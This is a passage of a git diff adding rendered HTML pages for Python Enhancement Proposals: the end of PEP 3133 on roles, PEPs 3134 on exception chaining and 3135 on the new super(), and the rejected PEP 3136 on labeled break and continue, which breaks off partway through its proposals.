+
+
+

Roles of Roles

+

Under the proposed semantics, it is possible for roles to +have roles of their own.

+
@perform_role(Y)
+class X(metaclass=Role):
+  ...
+
+
+

While this is possible, it is meaningless, since roles +are generally not instantiated. There has been some +off-line discussion about giving meaning to this expression, but so +far no good ideas have emerged.

+
+
+

class_performs()

+

It is currently not possible to ask a class if its instances perform +a given role. It may be desirable to provide an analogue to +performs() such that

+
>>> isinstance(my_dwarf, Dwarf)
+True
+>>> performs(my_dwarf, Surly)
+True
+>>> performs(Dwarf, Surly)
+False
+>>> class_performs(Dwarf, Surly)
+True
+
+
+
+
+

Prettier Dynamic Role Assignment

+

An early draft of this PEP included a separate mechanism for +dynamically assigning a role to a class. This was spelled

+
>>> now_perform(Dwarf, GoldMiner)
+
+
+

This same functionality already exists by unpacking the syntactic +sugar provided by decorators:

+
>>> perform_role(GoldMiner)(Dwarf)
+
+
+

At issue is whether dynamic role assignment is sufficiently important +to warrant a dedicated spelling.

+
+
+

Syntax Support

+

Though the phrasings laid out in this PEP are designed so that the +roles system could be shipped as a stand-alone package, it may be +desirable to add special syntax for defining, assigning and +querying roles. One example might be a role keyword, which would +translate

+
class MyRole(metaclass=Role):
+  ...
+
+
+

into

+
role MyRole:
+  ...
+
+
+

Assigning a role could take advantage of the class definition +arguments proposed in PEP 3115:

+
class MyClass(performs=MyRole):
+  ...
+
+
+
+
+
+

Implementation

+

A reference implementation is forthcoming.

+
+
+

Acknowledgements

+

Thanks to Jeffery Yasskin, Talin and Guido van Rossum for several +hours of in-person discussion to iron out the differences, overlap +and finer points of roles and abstract base classes.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3133.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3134/index.html b/pep-3134/index.html new file mode 100644 index 00000000000..0a1d0ec7335 --- /dev/null +++ b/pep-3134/index.html @@ -0,0 +1,659 @@ + + + + + + + + PEP 3134 – Exception Chaining and Embedded Tracebacks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3134 – Exception Chaining and Embedded Tracebacks

+
+
Author:
+
Ka-Ping Yee
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-May-2005
+
Python-Version:
+
3.0
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Numbering Note

+

This PEP started its life as PEP 344. Since it is now targeted for Python +3000, it has been moved into the 3xxx space.

+
+
+

Abstract

+

This PEP proposes three standard attributes on exception instances: the +__context__ attribute for implicitly chained exceptions, the __cause__ +attribute for explicitly chained exceptions, and the __traceback__ +attribute for the traceback. A new raise ... from statement sets the +__cause__ attribute.

+
+
+

Motivation

+

During the handling of one exception (exception A), it is possible that another +exception (exception B) may occur. In today’s Python (version 2.4), if this +happens, exception B is propagated outward and exception A is lost. In order +to debug the problem, it is useful to know about both exceptions. The +__context__ attribute retains this information automatically.

+

Sometimes it can be useful for an exception handler to intentionally re-raise +an exception, either to provide extra information or to translate an exception +to another type. The __cause__ attribute provides an explicit way to +record the direct cause of an exception.

+

In today’s Python implementation, exceptions are composed of three parts: the +type, the value, and the traceback. The sys module, exposes the current +exception in three parallel variables, exc_type, exc_value, and +exc_traceback, the sys.exc_info() function returns a tuple of these +three parts, and the raise statement has a three-argument form accepting +these three parts. Manipulating exceptions often requires passing these three +things in parallel, which can be tedious and error-prone. Additionally, the +except statement can only provide access to the value, not the traceback. +Adding the __traceback__ attribute to exception values makes all the +exception information accessible from a single place.

+
+
+

History

+

Raymond Hettinger [1] raised the issue of masked exceptions on Python-Dev in +January 2003 and proposed a PyErr_FormatAppend() function that C modules +could use to augment the currently active exception with more information. +Brett Cannon [2] brought up chained exceptions again in June 2003, prompting +a long discussion.

+

Greg Ewing [3] identified the case of an exception occurring in a finally +block during unwinding triggered by an original exception, as distinct from +the case of an exception occurring in an except block that is handling the +original exception.

+

Greg Ewing [4] and Guido van Rossum [5], and probably others, have +previously mentioned adding a traceback attribute to Exception instances. +This is noted in PEP 3000.

+

This PEP was motivated by yet another recent Python-Dev reposting of the same +ideas [6] [7].

+
+
+

Rationale

+

The Python-Dev discussions revealed interest in exception chaining for two +quite different purposes. To handle the unexpected raising of a secondary +exception, the exception must be retained implicitly. To support intentional +translation of an exception, there must be a way to chain exceptions +explicitly. This PEP addresses both.

+

Several attribute names for chained exceptions have been suggested on +Python-Dev [2], including cause, antecedent, reason, original, +chain, chainedexc, exc_chain, excprev, previous, and +precursor. For an explicitly chained exception, this PEP suggests +__cause__ because of its specific meaning. For an implicitly chained +exception, this PEP proposes the name __context__ because the intended +meaning is more specific than temporal precedence but less specific than +causation: an exception occurs in the context of handling another exception.

+

This PEP suggests names with leading and trailing double-underscores for these +three attributes because they are set by the Python VM. Only in very special +cases should they be set by normal assignment.

+

This PEP handles exceptions that occur during except blocks and finally +blocks in the same way. Reading the traceback makes it clear where the +exceptions occurred, so additional mechanisms for distinguishing the two cases +would only add unnecessary complexity.

+

This PEP proposes that the outermost exception object (the one exposed for +matching by except clauses) be the most recently raised exception for +compatibility with current behaviour.

+

This PEP proposes that tracebacks display the outermost exception last, because +this would be consistent with the chronological order of tracebacks (from +oldest to most recent frame) and because the actual thrown exception is easier +to find on the last line.

+

To keep things simpler, the C API calls for setting an exception will not +automatically set the exception’s __context__. Guido van Rossum has +expressed concerns with making such changes [8].

+

As for other languages, Java and Ruby both discard the original exception when +another exception occurs in a catch/rescue or finally/ensure +clause. Perl 5 lacks built-in structured exception handling. For Perl 6, RFC +number 88 [9] proposes an exception mechanism that implicitly retains chained +exceptions in an array named @@. In that RFC, the most recently raised +exception is exposed for matching, as in this PEP; also, arbitrary expressions +(possibly involving @@) can be evaluated for exception matching.

+

Exceptions in C# contain a read-only InnerException property that may point +to another exception. Its documentation [10] says that “When an exception X +is thrown as a direct result of a previous exception Y, the InnerException +property of X should contain a reference to Y.” This property is not set by +the VM automatically; rather, all exception constructors take an optional +innerException argument to set it explicitly. The __cause__ attribute +fulfills the same purpose as InnerException, but this PEP proposes a new +form of raise rather than extending the constructors of all exceptions. C# +also provides a GetBaseException method that jumps directly to the end of +the InnerException chain; this PEP proposes no analog.

+

The reason all three of these attributes are presented together in one proposal +is that the __traceback__ attribute provides convenient access to the +traceback on chained exceptions.

+
+
+

Implicit Exception Chaining

+

Here is an example to illustrate the __context__ attribute:

+
def compute(a, b):
+    try:
+        a/b
+    except Exception, exc:
+        log(exc)
+
+def log(exc):
+    file = open('logfile.txt')  # oops, forgot the 'w'
+    print >>file, exc
+    file.close()
+
+
+

Calling compute(0, 0) causes a ZeroDivisionError. The compute() +function catches this exception and calls log(exc), but the log() +function also raises an exception when it tries to write to a file that wasn’t +opened for writing.

+

In today’s Python, the caller of compute() gets thrown an IOError. The +ZeroDivisionError is lost. With the proposed change, the instance of +IOError has an additional __context__ attribute that retains the +ZeroDivisionError.

+

The following more elaborate example demonstrates the handling of a mixture of +finally and except clauses:

+
def main(filename):
+    file = open(filename)       # oops, forgot the 'w'
+    try:
+        try:
+            compute()
+        except Exception, exc:
+            log(file, exc)
+    finally:
+        file.clos()             # oops, misspelled 'close'
+
+def compute():
+    1/0
+
+def log(file, exc):
+    try:
+        print >>file, exc       # oops, file is not writable
+    except:
+        display(exc)
+
+def display(exc):
+    print ex                    # oops, misspelled 'exc'
+
+
+

Calling main() with the name of an existing file will trigger four +exceptions. The ultimate result will be an AttributeError due to the +misspelling of clos, whose __context__ points to a NameError due +to the misspelling of ex, whose __context__ points to an IOError +due to the file being read-only, whose __context__ points to a +ZeroDivisionError, whose __context__ attribute is None.

+

The proposed semantics are as follows:

+
    +
  1. Each thread has an exception context initially set to None.
  2. +
  3. Whenever an exception is raised, if the exception instance does not already +have a __context__ attribute, the interpreter sets it equal to the +thread’s exception context.
  4. +
  5. Immediately after an exception is raised, the thread’s exception context is +set to the exception.
  6. +
  7. Whenever the interpreter exits an except block by reaching the end or +executing a return, yield, continue, or break statement, the +thread’s exception context is set to None.
  8. +
+
+
+

Explicit Exception Chaining

+

The __cause__ attribute on exception objects is always initialized to +None. It is set by a new form of the raise statement:

+
raise EXCEPTION from CAUSE
+
+
+

which is equivalent to:

+
exc = EXCEPTION
+exc.__cause__ = CAUSE
+raise exc
+
+
+

In the following example, a database provides implementations for a few +different kinds of storage, with file storage as one kind. The database +designer wants errors to propagate as DatabaseError objects so that the +client doesn’t have to be aware of the storage-specific details, but doesn’t +want to lose the underlying error information.

+
class DatabaseError(Exception):
+    pass
+
+class FileDatabase(Database):
+    def __init__(self, filename):
+        try:
+            self.file = open(filename)
+        except IOError, exc:
+            raise DatabaseError('failed to open') from exc
+
+
+

If the call to open() raises an exception, the problem will be reported as +a DatabaseError, with a __cause__ attribute that reveals the +IOError as the original cause.

+
+
+

Traceback Attribute

+

The following example illustrates the __traceback__ attribute.

+
def do_logged(file, work):
+    try:
+        work()
+    except Exception, exc:
+        write_exception(file, exc)
+        raise exc
+
+from traceback import format_tb
+
+def write_exception(file, exc):
+    ...
+    type = exc.__class__
+    message = str(exc)
+    lines = format_tb(exc.__traceback__)
+    file.write(... type ... message ... lines ...)
+    ...
+
+
+

In today’s Python, the do_logged() function would have to extract the +traceback from sys.exc_traceback or sys.exc_info() [2] and pass both +the value and the traceback to write_exception(). With the proposed +change, write_exception() simply gets one argument and obtains the +exception using the __traceback__ attribute.

+

The proposed semantics are as follows:

+
    +
  1. Whenever an exception is caught, if the exception instance does not already +have a __traceback__ attribute, the interpreter sets it to the newly +caught traceback.
  2. +
+
+
+

Enhanced Reporting

+

The default exception handler will be modified to report chained exceptions. +The chain of exceptions is traversed by following the __cause__ and +__context__ attributes, with __cause__ taking priority. In keeping +with the chronological order of tracebacks, the most recently raised exception +is displayed last; that is, the display begins with the description of the +innermost exception and backs up the chain to the outermost exception. The +tracebacks are formatted as usual, with one of the lines:

+
The above exception was the direct cause of the following exception:
+
+
+

or

+
During handling of the above exception, another exception occurred:
+
+
+

between tracebacks, depending whether they are linked by __cause__ or +__context__ respectively. Here is a sketch of the procedure:

+
def print_chain(exc):
+    if exc.__cause__:
+        print_chain(exc.__cause__)
+        print '\nThe above exception was the direct cause...'
+    elif exc.__context__:
+        print_chain(exc.__context__)
+        print '\nDuring handling of the above exception, ...'
+    print_exc(exc)
+
+
+

In the traceback module, the format_exception, print_exception, +print_exc, and print_last functions will be updated to accept an +optional chain argument, True by default. When this argument is +True, these functions will format or display the entire chain of exceptions +as just described. When it is False, these functions will format or +display only the outermost exception.

+

The cgitb module should also be updated to display the entire chain of +exceptions.

+
+
+

C API

+

The PyErr_Set* calls for setting exceptions will not set the +__context__ attribute on exceptions. PyErr_NormalizeException will +always set the traceback attribute to its tb argument and the +__context__ and __cause__ attributes to None.

+

A new API function, PyErr_SetContext(context), will help C programmers +provide chained exception information. This function will first normalize the +current exception so it is an instance, then set its __context__ attribute. +A similar API function, PyErr_SetCause(cause), will set the __cause__ +attribute.

+
+
+

Compatibility

+

Chained exceptions expose the type of the most recent exception, so they will +still match the same except clauses as they do now.

+

The proposed changes should not break any code unless it sets or uses +attributes named __context__, __cause__, or __traceback__ on +exception instances. As of 2005-05-12, the Python standard library contains no +mention of such attributes.

+
+
+

Open Issue: Extra Information

+

Walter Dörwald [11] expressed a desire to attach extra information to an +exception during its upward propagation without changing its type. This could +be a useful feature, but it is not addressed by this PEP. It could conceivably +be addressed by a separate PEP establishing conventions for other informational +attributes on exceptions.

+
+
+

Open Issue: Suppressing Context

+

As written, this PEP makes it impossible to suppress __context__, since +setting exc.__context__ to None in an except or finally clause +will only result in it being set again when exc is raised.

+
+
+

Open Issue: Limiting Exception Types

+

To improve encapsulation, library implementors may want to wrap all +implementation-level exceptions with an application-level exception. One could +try to wrap exceptions by writing this:

+
try:
+    ... implementation may raise an exception ...
+except:
+    import sys
+    raise ApplicationError from sys.exc_value
+
+
+

or this:

+
try:
+    ... implementation may raise an exception ...
+except Exception, exc:
+    raise ApplicationError from exc
+
+
+

but both are somewhat flawed. It would be nice to be able to name the current +exception in a catch-all except clause, but that isn’t addressed here. +Such a feature would allow something like this:

+
try:
+    ... implementation may raise an exception ...
+except *, exc:
+    raise ApplicationError from exc
+
+
+
+
+

Open Issue: yield

+

The exception context is lost when a yield statement is executed; resuming +the frame after the yield does not restore the context. Addressing this +problem is out of the scope of this PEP; it is not a new problem, as +demonstrated by the following example:

+
 >>> def gen():
+ ...     try:
+ ...         1/0
+ ...     except:
+ ...         yield 3
+ ...         raise
+ ...
+ >>> g = gen()
+ >>> g.next()
+ 3
+ >>> g.next()
+TypeError: exceptions must be classes, instances, or strings
+(deprecated), not NoneType
+
+
+
+
+

Open Issue: Garbage Collection

+

The strongest objection to this proposal has been that it creates cycles +between exceptions and stack frames [12]. Collection of cyclic garbage (and +therefore resource release) can be greatly delayed.

+
>>> try:
+>>>     1/0
+>>> except Exception, err:
+>>>     pass
+
+
+

will introduce a cycle from err -> traceback -> stack frame -> err, keeping all +locals in the same scope alive until the next GC happens.

+

Today, these locals would go out of scope. There is lots of code which assumes +that “local” resources – particularly open files – will be closed quickly. +If closure has to wait for the next GC, a program (which runs fine today) may +run out of file handles.

+

Making the __traceback__ attribute a weak reference would avoid the +problems with cyclic garbage. Unfortunately, it would make saving the +Exception for later (as unittest does) more awkward, and it would not +allow as much cleanup of the sys module.

+

A possible alternate solution, suggested by Adam Olsen, would be to instead +turn the reference from the stack frame to the err variable into a weak +reference when the variable goes out of scope [13].

+
+
+

Possible Future Compatible Changes

+

These changes are consistent with the appearance of exceptions as a single +object rather than a triple at the interpreter level.

+
    +
  • If PEP 340 or PEP 343 is accepted, replace the three (type, value, +traceback) arguments to __exit__ with a single exception argument.
  • +
  • Deprecate sys.exc_type, sys.exc_value, sys.exc_traceback, and +sys.exc_info() in favour of a single member, sys.exception.
  • +
  • Deprecate sys.last_type, sys.last_value, and sys.last_traceback +in favour of a single member, sys.last_exception.
  • +
  • Deprecate the three-argument form of the raise statement in favour of the +one-argument form.
  • +
  • Upgrade cgitb.html() to accept a single value as its first argument as an +alternative to a (type, value, traceback) tuple.
  • +
+
+
+

Possible Future Incompatible Changes

+

These changes might be worth considering for Python 3000.

+
    +
  • Remove sys.exc_type, sys.exc_value, sys.exc_traceback, and +sys.exc_info().
  • +
  • Remove sys.last_type, sys.last_value, and sys.last_traceback.
  • +
  • Replace the three-argument sys.excepthook with a one-argument API, and +changing the cgitb module to match.
  • +
  • Remove the three-argument form of the raise statement.
  • +
  • Upgrade traceback.print_exception to accept an exception argument +instead of the type, value, and traceback arguments.
  • +
+
+
+

Implementation

+

The __traceback__ and __cause__ attributes and the new raise syntax +were implemented in revision 57783 [14].

+
+
+

Acknowledgements

+

Brett Cannon, Greg Ewing, Guido van Rossum, Jeremy Hylton, Phillip J. Eby, +Raymond Hettinger, Walter Dörwald, and others.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3134.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3135/index.html b/pep-3135/index.html new file mode 100644 index 00000000000..4a465c57193 --- /dev/null +++ b/pep-3135/index.html @@ -0,0 +1,361 @@ + + + + + + + + PEP 3135 – New Super | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3135 – New Super

+
+
Author:
+
Calvin Spealman <ironfroggy at gmail.com>, +Tim Delaney <timothy.c.delaney at gmail.com>, +Lie Ryan <lie.1296 at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+
28-Apr-2007, +29-Apr-2007, +29-Apr-2007, +14-May-2007, +12-Mar-2009
+
+
+
+
Table of Contents +
+
+

Numbering Note

+

This PEP started its life as PEP 367. Since it is now targeted +for Python 3000, it has been moved into the 3xxx space.

+
+
+

Abstract

+

This PEP proposes syntactic sugar for use of the super type to automatically +construct instances of the super type binding to the class that a method was +defined in, and the instance (or class object for classmethods) that the method +is currently acting upon.

+

The premise of the new super usage suggested is as follows:

+
super().foo(1, 2)
+
+
+

to replace the old:

+
super(Foo, self).foo(1, 2)
+
+
+
+
+

Rationale

+

The current usage of super requires an explicit passing of both the class and +instance it must operate from, requiring a breaking of the DRY (Don’t Repeat +Yourself) rule. This hinders any change in class name, and is often considered +a wart by many.

+
+
+

Specification

+

Within the specification section, some special terminology will be used to +distinguish similar and closely related concepts. “super class” will refer to +the actual builtin class named “super”. A “super instance” is simply an +instance of the super class, which is associated with another class and +possibly with an instance of that class.

+

The new super semantics are only available in Python 3.0.

+

Replacing the old usage of super, calls to the next class in the MRO (method +resolution order) can be made without explicitly passing the class object +(although doing so will still be supported). Every function +will have a cell named __class__ that contains the class object that the +function is defined in.

+

The new syntax:

+
super()
+
+
+

is equivalent to:

+
super(__class__, <firstarg>)
+
+
+

where __class__ is the class that the method was defined in, and +<firstarg> is the first parameter of the method (normally self +for instance methods, and cls for class methods). For functions +defined outside a class body, __class__ is not defined, and will +result in runtime SystemError.

+

While super is not a reserved word, the parser recognizes the use +of super in a method definition and only passes in the +__class__ cell when this is found. Thus, calling a global alias +of super without arguments will not necessarily work.

+
+
+

Closed Issues

+
+

Determining the class object to use

+

The class object is taken from a cell named __class__.

+
+
+

Should super actually become a keyword?

+

No. It is not necessary for super to become a keyword.

+
+
+

super used with __call__ attributes

+

It was considered that it might be a problem that instantiating super instances +the classic way, because calling it would lookup the __call__ attribute and +thus try to perform an automatic super lookup to the next class in the MRO. +However, this was found to be false, because calling an object only looks up +the __call__ method directly on the object’s type. The following example shows +this in action.

+
class A(object):
+    def __call__(self):
+        return '__call__'
+    def __getattribute__(self, attr):
+        if attr == '__call__':
+            return lambda: '__getattribute__'
+a = A()
+assert a() == '__call__'
+assert a.__call__() == '__getattribute__'
+
+
+

In any case, this issue goes away entirely because classic calls to +super(<class>, <instance>) are still supported with the same meaning.

+
+
+
+

Alternative Proposals

+
+

No Changes

+

Although its always attractive to just keep things how they are, people have +sought a change in the usage of super calling for some time, and for good +reason, all mentioned previously.

+
    +
  • Decoupling from the class name (which might not even be bound to the +right class anymore!)
  • +
  • Simpler looking, cleaner super calls would be better
  • +
+
+
+

Dynamic attribute on super type

+

The proposal adds a dynamic attribute lookup to the super type, which will +automatically determine the proper class and instance parameters. Each super +attribute lookup identifies these parameters and performs the super lookup on +the instance, as the current super implementation does with the explicit +invocation of a super instance upon a class and instance.

+

This proposal relies on sys._getframe(), which is not appropriate for anything +except a prototype implementation.

+
+
+

self.__super__.foo(*args)

+

The __super__ attribute is mentioned in this PEP in several places, and could +be a candidate for the complete solution, actually using it explicitly instead +of any super usage directly. However, double-underscore names are usually an +internal detail, and attempted to be kept out of everyday code.

+
+
+

super(self, *args) or __super__(self, *args)

+

This solution only solves the problem of the type indication, does not handle +differently named super methods, and is explicit about the name of the +instance. It is less flexible without being able to enacted on other method +names, in cases where that is needed. One use case this fails is where a +base-class has a factory classmethod and a subclass has two factory +classmethods,both of which needing to properly make super calls to the one +in the base-class.

+
+
+

super.foo(self, *args)

+

This variation actually eliminates the problems with locating the proper +instance, and if any of the alternatives were pushed into the spotlight, I +would want it to be this one.

+
+
+

super(*p, **kw)

+

There has been the proposal that directly calling super(*p, **kw) would +be equivalent to calling the method on the super object with the same name +as the method currently being executed i.e. the following two methods would be +equivalent:

+
def f(self, *p, **kw):
+    super.f(*p, **kw)
+
+
+
def f(self, *p, **kw):
+    super(*p, **kw)
+
+
+

There is strong sentiment for and against this, but implementation and style +concerns are obvious. Guido has suggested that this should be excluded from +this PEP on the principle of KISS (Keep It Simple Stupid).

+
+
+
+

History

+
+
29-Apr-2007
    +
  • Changed title from “Super As A Keyword” to “New Super”
  • +
  • Updated much of the language and added a terminology section +for clarification in confusing places.
  • +
  • Added reference implementation and history sections.
  • +
+
+
06-May-2007
    +
  • Updated by Tim Delaney to reflect discussions on the python-3000 +and python-dev mailing lists.
  • +
+
+
12-Mar-2009
    +
  • Updated to reflect the current state of implementation.
  • +
+
+
+
+
+

References

+

[1] Fixing super anyone? + (https://mail.python.org/pipermail/python-3000/2007-April/006667.html)

+

[2] PEP 3130: Access to Module/Class/Function Currently Being Defined (this) + (https://mail.python.org/pipermail/python-ideas/2007-April/000542.html)

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3135.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3136/index.html b/pep-3136/index.html new file mode 100644 index 00000000000..f53fdbf5a50 --- /dev/null +++ b/pep-3136/index.html @@ -0,0 +1,566 @@ + + + + + + + + PEP 3136 – Labeled break and continue | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3136 – Labeled break and continue

+
+
Author:
+
Matt Chisholm <matt-python at theory.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
30-Jun-2007
+
Python-Version:
+
3.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected. +See https://mail.python.org/pipermail/python-3000/2007-July/008663.html.

+
+
+

Abstract

+

This PEP proposes support for labels in Python’s break and +continue statements. It is inspired by labeled break and +continue in other languages, and the author’s own infrequent but +persistent need for such a feature.

+
+
+

Introduction

+

The break statement allows the programmer to terminate a loop +early, and the continue statement allows the programmer to move to +the next iteration of a loop early. In Python currently, break +and continue can apply only to the innermost enclosing loop.

+

Adding support for labels to the break and continue statements +is a logical extension to the existing behavior of the break and +continue statements. Labeled break and continue can +improve the readability and flexibility of complex code which uses +nested loops.

+

For brevity’s sake, the examples and discussion in this PEP usually +refers to the break statement. However, all of the examples and +motivations apply equally to labeled continue.

+
+
+

Motivation

+

If the programmer wishes to move to the next iteration of an outer +enclosing loop, or terminate multiple loops at once, he or she has a +few less-than elegant options.

+

Here’s one common way of imitating labeled break in Python (For +this and future examples, ... denotes an arbitrary number of +intervening lines of code):

+
for a in a_list:
+    time_to_break_out_of_a = False
+    ...
+    for b in b_list:
+        ...
+        if condition_one(a, b):
+            break
+        ...
+        if condition_two(a, b):
+            time_to_break_out_of_a = True
+            break
+        ...
+    if time_to_break_out_of_a:
+        break
+    ...
+
+
+

This requires five lines and an extra variable, +time_to_break_out_of_a, to keep track of when to break out of the +outer (a) loop. And those five lines are spread across many lines of +code, making the control flow difficult to understand.

+

This technique is also error-prone. A programmer modifying this code +might inadvertently put new code after the end of the inner (b) loop +but before the test for time_to_break_out_of_a, instead of after +the test. This means that code which should have been skipped by +breaking out of the outer loop gets executed incorrectly.

+

This could also be written with an exception. The programmer would +declare a special exception, wrap the inner loop in a try, and catch +the exception and break when you see it:

+
class BreakOutOfALoop(Exception): pass
+
+for a in a_list:
+    ...
+    try:
+        for b in b_list:
+            ...
+            if condition_one(a, b):
+                break
+            ...
+            if condition_two(a, b):
+                raise BreakOutOfALoop
+            ...
+    except BreakOutOfALoop:
+        break
+    ...
+
+
+

Again, though; this requires five lines and a new, single-purpose +exception class (instead of a new variable), and spreads basic control +flow out over many lines. And it breaks out of the inner loop with +break and out of the other loop with an exception, which is +inelegant. [1]

+

This next strategy might be the most elegant solution, assuming +condition_two() is inexpensive to compute:

+
for a in a_list:
+    ...
+    for b in b_list:
+        ...
+        if condition_one(a, b):
+            break
+        ...
+        if condition_two(a, b):
+            break
+        ...
+    if condition_two(a, b)
+        break
+    ...
+
+
+

Breaking twice is still inelegant. This implementation also relies on +the fact that the inner (b) loop bleeds b into the outer for loop, +which (although explicitly supported) is both surprising to novices, +and in my opinion counter-intuitive and poor practice.

+

The programmer must also still remember to put in both breaks on +condition two and not insert code before the second break. A single +conceptual action, breaking out of both loops on condition_two(), +requires four lines of code at two indentation levels, possibly +separated by many intervening lines at the end of the inner (b) loop.

+
+

Other languages

+

Now, put aside whatever dislike you may have for other programming +languages, and consider the syntax of labeled break and +continue. In Perl:

+
ALOOP: foreach $a (@a_array){
+    ...
+    BLOOP: foreach $b (@b_array){
+        ...
+        if (condition_one($a,$b)){
+            last BLOOP; # same as plain old last;
+        }
+        ...
+        if (condition_two($a,$b)){
+            last ALOOP;
+        }
+        ...
+    }
+    ...
+}
+
+
+

(Notes: Perl uses last instead of break. The BLOOP labels +could be omitted; last and continue apply to the innermost +loop by default.)

+

PHP uses a number denoting the number of loops to break out of, rather +than a label:

+
foreach ($a_array as $a){
+    ....
+    foreach ($b_array as $b){
+        ....
+        if (condition_one($a, $b)){
+            break 1;  # same as plain old break
+        }
+        ....
+        if (condition_two($a, $b)){
+            break 2;
+        }
+        ....
+    }
+    ...
+}
+
+
+

C/C++, Java, and Ruby all have similar constructions.

+

The control flow regarding when to break out of the outer (a) loop is +fully encapsulated in the break statement which gets executed when +the break condition is satisfied. The depth of the break statement +does not matter. Control flow is not spread out. No extra variables, +exceptions, or re-checking or storing of control conditions is +required. There is no danger that code will get inadvertently +inserted after the end of the inner (b) loop and before the break +condition is re-checked inside the outer (a) loop. These are the +benefits that labeled break and continue would bring to +Python.

+
+
+
+

What this PEP is not

+

This PEP is not a proposal to add GOTO to Python. GOTO allows a +programmer to jump to an arbitrary block or line of code, and +generally makes control flow more difficult to follow. Although +break and continue (with or without support for labels) can be +considered a type of GOTO, it is much more restricted. Another Python +construct, yield, could also be considered a form of GOTO – an +even less restrictive one. The goal of this PEP is to propose an +extension to the existing control flow tools break and +continue, to make control flow easier to understand, not more +difficult.

+

Labeled break and continue cannot transfer control to another +function or method. They cannot even transfer control to an arbitrary +line of code in the current scope. Currently, they can only affect +the behavior of a loop, and are quite different and much more +restricted than GOTO. This extension allows them to affect any +enclosing loop in the current name-space, but it does not change their +behavior to that of GOTO.

+
+
+

Specification

+

Under all of these proposals, break and continue by themselves +will continue to behave as they currently do, applying to the +innermost loop by default.

+
+

Proposal A - Explicit labels

+

The for and while loop syntax will be followed by an optional as +or label (contextual) keyword [2] and then an identifier, +which may be used to identify the loop out of which to break (or which +should be continued).

+

The break (and continue) statements will be followed by an +optional identifier that refers to the loop out of which to break (or +which should be continued). Here is an example using the as +keyword:

+
for a in a_list as a_loop:
+    ...
+    for b in b_list as b_loop:
+        ...
+        if condition_one(a, b):
+            break b_loop  # same as plain old break
+        ...
+        if condition_two(a, b):
+            break a_loop
+        ...
+    ...
+
+
+

Or, with label instead of as:

+
for a in a_list label a_loop:
+    ...
+    for b in b_list label b_loop:
+        ...
+        if condition_one(a, b):
+            break b_loop  # same as plain old break
+        ...
+        if condition_two(a, b):
+            break a_loop
+        ...
+    ...
+
+
+

This has all the benefits outlined above. It requires modifications +to the language syntax: the syntax of break and continue +syntax statements and for and while statements. It requires either a +new conditional keyword label or an extension to the conditional +keyword as. [3] It is unlikely to require any changes to +existing Python programs. Passing an identifier not defined in the +local scope to break or continue would raise a NameError.

+
+
+

Proposal B - Numeric break & continue

+

Rather than altering the syntax of for and while loops, +break and continue would take a numeric argument denoting the +enclosing loop which is being controlled, similar to PHP.

+

It seems more Pythonic to me for break and continue to refer +to loops indexing from zero, as opposed to indexing from one as PHP +does.

+
for a in a_list:
+    ...
+    for b in b_list:
+        ...
+        if condition_one(a,b):
+            break 0  # same as plain old break
+        ...
+        if condition_two(a,b):
+            break 1
+        ...
+    ...
+
+
+

Passing a number that was too large, or less than zero, or non-integer +to break or continue would (probably) raise an IndexError.

+

This proposal would not require any changes to existing Python +programs.

+
+
+

Proposal C - The reduplicative method

+

The syntax of break and continue would be altered to allow +multiple break and continue statements on the same line. Thus, +break break would break out of the first and second enclosing +loops.

+
for a in a_list:
+    ...
+    for b in b_list:
+        ...
+        if condition_one(a,b):
+            break  # plain old break
+        ...
+        if condition_two(a,b):
+            break break
+        ...
+    ...
+
+
+

This would also allow the programmer to break out of the inner loop +and continue the next outermost simply by writing break continue, +[4] and so on. I’m not sure what exception would be +raised if the programmer used more break or continue +statements than existing loops (perhaps a SyntaxError?).

+

I expect this proposal to get rejected because it will be judged too +difficult to understand.

+

This proposal would not require any changes to existing Python +programs.

+
+
+

Proposal D - Explicit iterators

+

Rather than embellishing for and while loop syntax with labels, the +programmer wishing to use labeled breaks would be required to create +the iterator explicitly and assign it to an identifier if he or she +wanted to break out of or continue that loop from within a +deeper loop.

+
a_iter = iter(a_list)
+for a in a_iter:
+    ...
+    b_iter = iter(b_list)
+    for b in b_iter:
+        ...
+        if condition_one(a,b):
+            break b_iter  # same as plain old break
+        ...
+        if condition_two(a,b):
+            break a_iter
+        ...
+    ...
+
+
+

Passing a non-iterator object to break or continue would raise +a TypeError; and a nonexistent identifier would raise a NameError. +This proposal requires only one extra line to create a labeled loop, +and no extra lines to break out of a containing loop, and no changes +to existing Python programs.

+
+
+

Proposal E - Explicit iterators and iterator methods

+

This is a variant of Proposal D. Iterators would need be created +explicitly if anything other that the most basic use of break and +continue was required. Instead of modifying the syntax of +break and continue, .break() and .continue() methods +could be added to the Iterator type.

+
a_iter = iter(a_list)
+for a in a_iter:
+    ...
+    b_iter = iter(b_list)
+    for b in b_iter:
+        ...
+        if condition_one(a,b):
+            b_iter.break()  # same as plain old break
+        ...
+        if condition_two(a,b):
+            a_iter.break()
+        ...
+    ...
+
+
+

